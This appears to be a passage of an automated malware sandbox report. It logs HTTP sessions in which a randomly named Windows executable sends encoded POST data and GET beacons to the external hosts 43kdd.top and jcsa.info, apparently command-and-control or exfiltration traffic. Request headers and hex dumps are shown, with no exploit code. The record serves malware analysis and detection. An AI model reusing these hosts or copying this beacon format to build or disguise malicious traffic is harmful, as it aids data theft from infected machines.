                                                                                                              29192.168.2.1051556154.23.178.231806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:26:49.493855953 CET738OUTPOST /p3j6/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 191
                                                                                                              Connection: close
                                                                                                              Host: www.43kdd.top
                                                                                                              Origin: http://www.43kdd.top
                                                                                                              Referer: http://www.43kdd.top/p3j6/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 44 58 35 57 42 7a 37 50 69 38 6b 64 6a 32 32 64 54 45 62 59 49 73 5a 48 6e 75 79 6b 64 4b 72 34 55 6c 42 61 55 39 79 4c 68 54 6a 71 35 63 6f 7a 71 33 76 45 2f 32 56 4c 53 57 65 4f 33 4f 4e 37 62 36 7a 78 49 49 6e 75 58 78 66 41 36 65 41 58 2f 6d 48 49 41 57 7a 41 52 6a 4f 37 36 74 34 33 75 49 59 6e 43 4d 52 52 36 43 50 51 30 6b 6e 4a 72 49 47 4d 71 4b 61 6f 5a 53 63 39 62 79 52 57 65 71 49 71 2b 6a 76 57 78 4e 79 6b 67 67 51 6e 64 6d 78 57 38 32 44 49 53 4c 59 32 74 36 54 41 36 37 79 4d 4b 65 39 65 4f 48 67 64 37 30 74 68 48 74 4d 56 6b 41 63 5a 50 34 67 6b
                                                                                                              Data Ascii: 6n=DX5WBz7Pi8kdj22dTEbYIsZHnuykdKr4UlBaU9yLhTjq5cozq3vE/2VLSWeO3ON7b6zxIInuXxfA6eAX/mHIAWzARjO76t43uIYnCMRR6CPQ0knJrIGMqKaoZSc9byRWeqIq+jvWxNykggQndmxW82DISLY2t6TA67yMKe9eOHgd70thHtMVkAcZP4gk
                                                                                                              Jan 11, 2025 03:26:50.383697987 CET312INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx
                                                                                                              Date: Sat, 11 Jan 2025 02:26:50 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 148
                                                                                                              Connection: close
                                                                                                              ETag: "67811756-94"
                                                                                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              30192.168.2.1051557154.23.178.231806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:26:52.049612999 CET762OUTPOST /p3j6/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 215
                                                                                                              Connection: close
                                                                                                              Host: www.43kdd.top
                                                                                                              Origin: http://www.43kdd.top
                                                                                                              Referer: http://www.43kdd.top/p3j6/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 44 58 35 57 42 7a 37 50 69 38 6b 64 6a 56 75 64 52 6a 76 59 63 38 5a 45 69 75 79 6b 48 36 72 6b 55 6c 4e 61 55 34 4b 6c 68 68 33 71 35 38 59 7a 6c 57 76 45 36 32 56 4c 64 47 65 4c 36 75 4e 4b 62 36 75 4f 49 4c 2f 75 58 78 4c 41 36 66 77 58 38 56 76 4c 42 47 7a 65 61 44 4f 6c 6e 64 34 33 75 49 59 6e 43 4d 30 36 36 43 58 51 31 51 6a 4a 35 35 47 50 6e 71 61 72 51 79 63 39 4d 69 52 53 65 71 4a 4e 2b 69 79 65 78 4f 61 6b 67 69 49 6e 64 54 4e 56 7a 32 44 4b 57 4c 59 70 6a 34 57 7a 6a 2b 61 6f 56 50 39 77 59 58 34 4e 34 56 51 6d 57 38 74 43 33 33 41 58 42 2b 56 4f 4b 36 70 45 76 6d 50 6a 4b 70 48 51 79 43 62 43 43 71 74 71 42 67 3d 3d
                                                                                                              Data Ascii: 6n=DX5WBz7Pi8kdjVudRjvYc8ZEiuykH6rkUlNaU4Klhh3q58YzlWvE62VLdGeL6uNKb6uOIL/uXxLA6fwX8VvLBGzeaDOlnd43uIYnCM066CXQ1QjJ55GPnqarQyc9MiRSeqJN+iyexOakgiIndTNVz2DKWLYpj4Wzj+aoVP9wYX4N4VQmW8tC33AXB+VOK6pEvmPjKpHQyCbCCqtqBg==
                                                                                                              Jan 11, 2025 03:26:52.949693918 CET312INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx
                                                                                                              Date: Sat, 11 Jan 2025 02:26:52 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 148
                                                                                                              Connection: close
                                                                                                              ETag: "67811756-94"
                                                                                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              31192.168.2.1051558154.23.178.231806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:26:54.601946115 CET1775OUTPOST /p3j6/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 1227
                                                                                                              Connection: close
                                                                                                              Host: www.43kdd.top
                                                                                                              Origin: http://www.43kdd.top
                                                                                                              Referer: http://www.43kdd.top/p3j6/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 44 58 35 57 42 7a 37 50 69 38 6b 64 6a 56 75 64 52 6a 76 59 63 38 5a 45 69 75 79 6b 48 36 72 6b 55 6c 4e 61 55 34 4b 6c 68 68 50 71 35 76 51 7a 6b 31 33 45 39 32 56 4c 65 47 65 4b 36 75 4e 54 62 36 32 43 49 4d 33 55 58 7a 7a 41 37 38 6f 58 33 45 76 4c 50 47 7a 65 56 6a 4f 34 36 74 34 69 75 4a 6f 38 43 4d 45 36 36 43 58 51 31 57 50 4a 37 6f 47 50 30 61 61 6f 5a 53 63 4c 62 79 52 32 65 72 74 33 2b 69 47 4f 77 2b 36 6b 67 43 59 6e 4f 52 6c 56 73 47 44 45 62 72 5a 38 6a 35 71 73 6a 34 2b 6b 56 50 49 56 59 55 59 4e 70 6a 74 4b 47 34 6f 55 6b 6b 59 57 48 59 4a 77 47 65 6b 6b 6c 55 79 51 44 4a 65 4d 78 52 43 44 4c 4b 41 30 66 56 7a 35 6f 44 6b 71 49 4c 2f 43 4a 4f 45 37 64 46 44 67 42 6f 51 67 61 79 57 31 79 79 2f 7a 62 73 58 55 6b 50 6c 59 51 5a 59 39 36 7a 4d 32 65 79 6d 7a 45 42 7a 35 50 30 55 52 42 75 43 5a 63 2f 4a 55 4c 56 72 2b 51 7a 75 37 4a 49 68 34 54 42 54 6f 4d 34 6f 30 6f 4f 67 54 34 5a 51 63 2f 7a 46 39 6d 74 55 6b 2b 41 30 59 47 75 57 47 59 41 6d 70 2b 55 49 73 6d 6b 36 6c 61 4d 47 [TRUNCATED]
                                                                                                              Data Ascii: 6n=DX5WBz7Pi8kdjVudRjvYc8ZEiuykH6rkUlNaU4KlhhPq5vQzk13E92VLeGeK6uNTb62CIM3UXzzA78oX3EvLPGzeVjO46t4iuJo8CME66CXQ1WPJ7oGP0aaoZScLbyR2ert3+iGOw+6kgCYnORlVsGDEbrZ8j5qsj4+kVPIVYUYNpjtKG4oUkkYWHYJwGekklUyQDJeMxRCDLKA0fVz5oDkqIL/CJOE7dFDgBoQgayW1yy/zbsXUkPlYQZY96zM2eymzEBz5P0URBuCZc/JULVr+Qzu7JIh4TBToM4o0oOgT4ZQc/zF9mtUk+A0YGuWGYAmp+UIsmk6laMGPGYkNPq2PeHdontkMW0+rrfpIcAn7g85JzibReKR68XcUaY3ctPPEnufkhi4+s+tcMUFuGtrAhIjeeoYhsar/6PsnJEfeZS0kAuess+KjEKpqf3A1ZzXWzgHYIBk0HQcqa1+RM4HxQmevrf2sH3z+O/cbdIxeTUORgeaH4pECyz+RxVBPyCvQfwLSx5MjpSwktVwj8m9Rs3DNG9Eu6UWsafS/F6NgEBfAGwmycU3Cpv5LbNkfRpDKqOYpYmoTYTSEXWXl4RfiFhrWAuDunzTHnP8YBFy7URfWAQGgWRYp1EpjNgON98R+1fstyjK0uxQTu9fjsrpPZR7VxqhLEea7iM0RrQVu5ozxuZmi/kt2SDDl6PJafQrHkA6PX3Un+Bmn2/ps49YfsML+1kQllaE4HxxnLT5J1HfwQhGivyapVmBdMwWmSIZg4s39TSPZeLxV2CrmfxvuI+agbE8BwypbMVV/3BeasPMdJBkxs0cICgsjNLERFUJn+E63wbZoXC9PHndpP9g1QM5tGhRUYLewJeUPe/ROUeKTuP8B04AxWcaAgKG9PzKoU29sY8MglBz4SiAWkt+Hn9RoQ0Fv7335KYyolwCTIoi0DUgh6LiA8rMvXXfRszpLnYmQHpPgv5gz7lggBGEg4Q/AXd7T83D8NQd0WbeCU0Khh [TRUNCATED]


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              32192.168.2.1051559154.23.178.231806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:26:57.139301062 CET484OUTGET /p3j6/?6n=OVR2CF7p+NAClGW1MELAdr9D19OOCZyiV2x0cNqPuUjpn/Qhs1nMs1p1ZXuPw6NSEK+YKob7dwv93+8G93LPKWq9PBiy69Y2nadeDtRJ0gD55AbRoA==&P8dT=Gvw8Prk0H4 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Connection: close
                                                                                                              Host: www.43kdd.top
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Jan 11, 2025 03:26:58.019992113 CET312INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx
                                                                                                              Date: Sat, 11 Jan 2025 02:26:57 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 148
                                                                                                              Connection: close
                                                                                                              ETag: "67811756-94"
                                                                                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              33192.168.2.1051560208.91.197.39806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:27:03.305949926 CET738OUTPOST /hxi5/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 191
                                                                                                              Connection: close
                                                                                                              Host: www.jcsa.info
                                                                                                              Origin: http://www.jcsa.info
                                                                                                              Referer: http://www.jcsa.info/hxi5/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 79 7a 6c 65 54 58 4c 68 5a 68 50 6f 78 74 6c 78 6b 34 30 52 66 2b 63 6b 4d 77 64 69 76 59 61 35 6a 77 55 48 70 6e 73 4b 33 52 53 62 72 37 64 46 74 74 47 69 37 65 70 36 44 58 6d 6b 37 4c 6b 5a 6a 6e 33 4c 55 70 49 58 69 52 41 38 4f 33 6b 6e 4e 31 65 53 42 66 78 78 6b 2f 34 2b 4f 41 64 75 56 6d 6e 59 73 33 52 7a 65 7a 6f 33 4a 67 46 61 39 57 74 75 6a 56 4d 78 6d 4c 56 73 63 2f 59 58 44 64 2f 57 55 50 41 44 6a 32 6a 47 76 30 6d 72 37 4d 6f 30 42 59 58 6d 2b 54 72 69 2b 61 4a 36 54 30 6b 73 47 39 44 66 6d 67 71 45 4e 66 2f 59 61 6c 67 37 48 75 79 37 56 73 45 35
                                                                                                              Data Ascii: 6n=yzleTXLhZhPoxtlxk40Rf+ckMwdivYa5jwUHpnsK3RSbr7dFttGi7ep6DXmk7LkZjn3LUpIXiRA8O3knN1eSBfxxk/4+OAduVmnYs3Rzezo3JgFa9WtujVMxmLVsc/YXDd/WUPADj2jGv0mr7Mo0BYXm+Tri+aJ6T0ksG9DfmgqENf/Yalg7Huy7VsE5


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              34192.168.2.1051561208.91.197.39806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:27:05.850543022 CET762OUTPOST /hxi5/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 215
                                                                                                              Connection: close
                                                                                                              Host: www.jcsa.info
                                                                                                              Origin: http://www.jcsa.info
                                                                                                              Referer: http://www.jcsa.info/hxi5/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 79 7a 6c 65 54 58 4c 68 5a 68 50 6f 78 4e 31 78 6f 37 73 52 49 4f 63 6e 51 67 64 69 34 49 61 6c 6a 77 59 48 70 6d 5a 58 30 69 6d 62 72 5a 31 46 73 73 47 69 75 65 70 36 4c 33 6e 75 6d 62 6b 6f 6a 6d 4b 32 55 70 30 58 69 52 55 38 4f 31 73 6e 4d 43 4b 54 42 50 78 7a 2f 50 34 38 41 67 64 75 56 6d 6e 59 73 33 46 56 65 31 41 33 4a 51 56 61 37 7a 52 74 2f 6c 4d 79 79 62 56 73 4e 76 59 54 44 64 2f 77 55 4d 45 74 6a 30 62 47 76 78 61 72 31 39 6f 31 57 49 57 74 7a 7a 71 2b 7a 5a 59 70 5a 78 63 57 46 50 48 32 36 6a 69 48 44 65 43 66 4c 30 42 73 55 5a 75 31 62 71 78 54 50 69 47 50 5a 4a 6f 4e 54 69 45 37 67 6b 4f 36 34 36 38 50 59 51 3d 3d
                                                                                                              Data Ascii: 6n=yzleTXLhZhPoxN1xo7sRIOcnQgdi4IaljwYHpmZX0imbrZ1FssGiuep6L3numbkojmK2Up0XiRU8O1snMCKTBPxz/P48AgduVmnYs3FVe1A3JQVa7zRt/lMyybVsNvYTDd/wUMEtj0bGvxar19o1WIWtzzq+zZYpZxcWFPH26jiHDeCfL0BsUZu1bqxTPiGPZJoNTiE7gkO6468PYQ==


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              35192.168.2.1051562208.91.197.39806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:27:08.421325922 CET1775OUTPOST /hxi5/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 1227
                                                                                                              Connection: close
                                                                                                              Host: www.jcsa.info
                                                                                                              Origin: http://www.jcsa.info
                                                                                                              Referer: http://www.jcsa.info/hxi5/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 79 7a 6c 65 54 58 4c 68 5a 68 50 6f 78 4e 31 78 6f 37 73 52 49 4f 63 6e 51 67 64 69 34 49 61 6c 6a 77 59 48 70 6d 5a 58 30 6a 65 62 71 6f 56 46 73 4c 71 69 6f 75 70 36 46 58 6e 74 6d 62 6b 50 6a 6d 53 79 55 70 34 68 69 54 73 38 4f 51 67 6e 46 54 4b 54 4b 50 78 7a 33 76 34 2f 4f 41 64 42 56 6c 50 63 73 33 56 56 65 31 41 33 4a 57 5a 61 38 6d 74 74 73 31 4d 78 6d 4c 56 4a 63 2f 59 76 44 64 6e 4f 55 4e 77 54 69 41 76 47 76 52 71 72 33 50 77 31 4a 34 57 76 77 7a 71 32 7a 5a 56 78 5a 31 38 77 46 4f 6a 51 36 6a 4b 48 42 59 44 62 61 47 39 37 47 49 58 76 64 72 51 74 50 53 61 45 58 37 5a 30 64 7a 59 4d 79 41 54 46 7a 34 70 52 4b 69 72 46 66 75 47 46 6f 34 77 33 47 35 48 4e 65 56 2b 58 68 4e 4a 7a 51 4d 55 52 34 4a 52 6c 43 73 31 77 4b 36 47 5a 61 4d 47 6e 66 32 4d 5a 33 6b 56 53 41 43 59 6c 4a 45 67 33 61 55 73 37 75 55 30 6f 44 52 53 35 6e 77 57 45 4b 67 69 37 67 52 6b 38 4d 30 63 77 55 58 69 6b 48 52 79 42 64 4e 45 62 55 71 55 69 6d 30 70 49 37 37 5a 74 76 79 78 58 6f 69 79 39 4a 6b 31 79 44 62 43 [TRUNCATED]
                                                                                                              Data Ascii: 6n=yzleTXLhZhPoxN1xo7sRIOcnQgdi4IaljwYHpmZX0jebqoVFsLqioup6FXntmbkPjmSyUp4hiTs8OQgnFTKTKPxz3v4/OAdBVlPcs3VVe1A3JWZa8mtts1MxmLVJc/YvDdnOUNwTiAvGvRqr3Pw1J4Wvwzq2zZVxZ18wFOjQ6jKHBYDbaG97GIXvdrQtPSaEX7Z0dzYMyATFz4pRKirFfuGFo4w3G5HNeV+XhNJzQMUR4JRlCs1wK6GZaMGnf2MZ3kVSACYlJEg3aUs7uU0oDRS5nwWEKgi7gRk8M0cwUXikHRyBdNEbUqUim0pI77ZtvyxXoiy9Jk1yDbCkaIkgOP1KHh4Ek9+hCQvpTcP7zH8/47NAUYuHvjXVxG4WCGI2lUP7rlp54gP30GMn/PVG/bOWW2xktOH1DGpbNwc9uqL6jgmgOdE0LQon5UdNNl4JLpUuapEk4MBoCc2+yuWmJ0pA2TtLVgypcRLa5NXMwftKBhP4LqkCqV4PkV6C6YqmON1oMffYzPlCSncKiUhx+4y6kkr84401mbxtcUD81RXLTLYy/fAA/4X7rhKEpYRlSPnetgmcWlL2HB+ZVpUJyYC4pwbNE4QD60fxw/WVwIQ4oHBgRZQjVUPkKEBwBmXdkj2w2v3u2AKa33eU1mXaFmb++A+3+hHpTpmIb9Iu4LKUDQqBY+eh3KfYHGS2U1LXwQGuE8H3zpfRfqfMP/8fBRWp/CVxknz3ZWNIFEjF7zc/uEn2hS0WlEzwaxv0EIIma1htoaRVK2CQtIU/YSnhV/C9QeqvxCaMik0t5kNA2d+FuNSTAh59S5d1NVdLwbaULcFiHpwD5fnE5hdwaDV1Tl062dbJMFE7ASCtOa/fxaQf5aFFOVSIZEqcvZMA91Z4tGEAv1swJcQUCzotnP4V3tWMmVNO2logPDEccE4d+GO+EH5kHzj+mKqk8U4dcfu/YD+IAlFxswh25d4sc6dyHC6fggIDhEpHXttLREjRb716RzP6y [TRUNCATED]


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              36192.168.2.1051563208.91.197.39806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:27:10.967158079 CET484OUTGET /hxi5/?6n=/xN+QifpSgLb8oJZvOcEecwEXTNjyqH/ixYmgFld7FWiq7hEgfqLv6xcCSKy7O4D9GLUZYEuvgkAAG4+HQzECON3mfxJeBtjbn7k9Vw2XGkLNgd8mA==&P8dT=Gvw8Prk0H4 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Connection: close
                                                                                                              Host: www.jcsa.info
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Jan 11, 2025 03:27:12.561743975 CET1236INHTTP/1.1 200 OK
                                                                                                              Date: Sat, 11 Jan 2025 02:27:11 GMT
                                                                                                              Server: Apache
                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                              Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                              Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                              Set-Cookie: vsid=901vr484108031203534161; expires=Thu, 10-Jan-2030 02:27:11 GMT; Max-Age=157680000; path=/; domain=www.jcsa.info; HttpOnly
                                                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_CiYxcRbiigQANs0PAjR1CVOzwgfJyr99DXqjoobNtoDt27jMP2Qkn86y6/sRZDbYDydSvZJkx9p6rnuRz9TiZw==
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Connection: close
                                                                                                              Data Raw: 61 62 63 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20
                                                                                                              Data Ascii: abc1<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net">
                                                                                                              Jan 11, 2025 03:27:12.561777115 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d
                                                                                                              Data Ascii: <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)
                                                                                                              Jan 11, 2025 03:27:12.561789036 CET257INData Raw: 66 28 74 79 70 65 6f 66 28 6a 29 21 3d 22 62 6f 6f 6c 65 61 6e 22 29 7b 6a 3d 74 72 75 65 7d 69 66 28 6a 26 26 74 79 70 65 6f 66 28 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 29 3d 3d 22 73 74 72 69 6e 67 22 26 26 63 6d 70 5f 67
                                                                                                              Data Ascii: f(typeof(j)!="boolean"){j=true}if(j&&typeof(cmp_getlang.usedlang)=="string"&&cmp_getlang.usedlang!==""){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="languages" in na
